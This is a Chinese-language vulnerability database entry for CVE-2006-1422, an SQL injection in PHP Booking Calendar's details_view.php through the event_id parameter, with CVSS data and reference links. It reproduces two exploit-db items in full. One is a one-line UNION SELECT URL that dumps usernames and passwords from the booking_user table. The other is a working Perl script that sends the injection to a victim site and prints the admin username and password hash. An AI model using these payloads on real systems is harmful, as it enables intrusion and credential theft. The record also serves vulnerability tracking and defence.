CVE-2006-1422
CVSS5.0
发布时间 :2006-03-28 15:02:00
修订时间 :2008-09-05 17:01:52
NMCOE    

[原文]SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the event_id parameter.


[CNNVD]PHPBookingCalendar Details_View.PHP SQL注入漏洞(CNNVD-200603-435)

        在PHP Booking Calendar 1.0c及更早版本的details_view.php中存在SQL注入漏洞,远程攻击者可通过event_id参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1422
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1422
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-435
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17230
(UNKNOWN)  BID  17230
http://www.milw0rm.com/exploits/1610
(UNKNOWN)  MILW0RM  1610
http://xforce.iss.net/xforce/xfdb/25580
(UNKNOWN)  XF  phpbookingcal-detailsview-sql-injection(25580)

- 漏洞信息

PHPBookingCalendar Details_View.PHP SQL注入漏洞
中危 SQL注入
2006-03-28 00:00:00 2006-03-28 00:00:00
远程  
        在PHP Booking Calendar 1.0c及更早版本的details_view.php中存在SQL注入漏洞,远程攻击者可通过event_id参数执行任意SQL命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1610)

phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection (EDBID:1610)
php webapps
2006-03-25 Verified
0 undefined1_
N/A [点击下载]
PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html

phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user

# milw0rm.com [2006-03-25]
		

- 漏洞信息 (5696)

PHP Booking Calendar 10 d Remote SQL Injection Exploit (EDBID:5696)
php webapps
2008-05-29 Verified
0 Stack
[点击下载] [点击下载]
# Portal   :PHP Booking Calendar 10 d (sql/upload) Exploit
# Modified 2008
# Download :  https://sourceforge.net/project/showfiles.php?group_id=132702
# exploit aported password  crypted
########################################
#[*] Founded &  Exploited by : Stack
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs  :)
################################################################################
# Exploit-DB Note (May 28th 2012)
# PHP Booking Calendar 10e is also affected by this
#
#
#!/usr/bin/perl -w
########################################
# * TITLE:          PerlSploit Class
# * REQUIREMENTS:   PHP 4 / PHP 5
# * VERSION:        v.1
# * LICENSE:        GNU General Public License
# * ORIGINAL URL:   http://www.v4-Team/v4.txt
# * FILENAME:       PerlSploitClass.pl
# *
# * CONTACT:       Wanted :
# * THNX : AllaH
# * GREETZ:         Houssamix & Djekmani
########################################
#----------------------------------------------------------------------------#
########################################
system("color 02");
print "\t\t############################################################\n\n";
print "\t\t#   PHP Booking Calendar 10 d - Remote SQL Inj Exploit     #\n\n";
print "\t\t#                         by Stack                         #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username of  news manages
$user="username";
#the pasword of  news manages
$pass="passwd";
#the tables of news manages
$tab="booking_user";
$fil="details_view.php";
$varo="event_id";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /::(.*?)::::/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by Stack --------------------#
########################################

# milw0rm.com [2008-05-29]
		

- 漏洞信息

31624
PHP Booking Calendar details_view.php event_id SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-25 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站